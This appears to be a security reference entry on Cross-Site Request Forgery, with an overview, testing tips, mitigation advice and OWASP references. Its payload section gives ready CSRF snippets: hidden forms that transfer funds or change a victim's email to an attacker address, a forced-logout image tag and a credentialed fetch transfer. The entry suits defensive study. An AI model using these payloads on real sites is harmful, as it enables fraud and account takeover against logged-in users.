Csrf

Overview

Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application in which they are currently authenticated. The attacker crafts a malicious request that performs a state-changing operation, such as transferring funds or changing credentials.

CSRF exploits the trust that an application has in an authenticated user's browser, using the user's active session to perform unauthorized operations.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Csrf:

<form action="https://target.com/transfer" method="POST"><input type="hidden" name="amount" value="1000" /><input type="submit" /></form>

<img src="https://target.com/logout" />

<form action="https://target.com/email/change" method="POST"><input type="hidden" name="email" value="attacker@evil.com" /><input type="submit" /></form>

fetch('https://target.com/api/transfer', {method:'POST', credentials:'include', body: JSON.stringify({to:'attacker', amount:1000})})

Tools & Techniques

Recommended tools for Csrf:

• Test for absence of CSRF tokens in state-changing requests
• Check if SameSite cookies are implemented
• Verify that CORS headers don't bypass CSRF protections
• Use Burp Suite CSRF Token Scanner

Prevention & Mitigation

Security recommendations to prevent Csrf:

• Implement anti-CSRF tokens for all state-changing requests
• Use SameSite=Strict or SameSite=Lax cookie attribute
• Set custom request headers (X-Requested-By, X-CSRF-Token)
• Implement re-authentication for sensitive actions
• Use CAPTCHA or multi-step confirmation flows

References

Additional resources:

• https://portswigger.net/web-security/csrf
• https://owasp.org/www-community/attacks/csrf
• https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html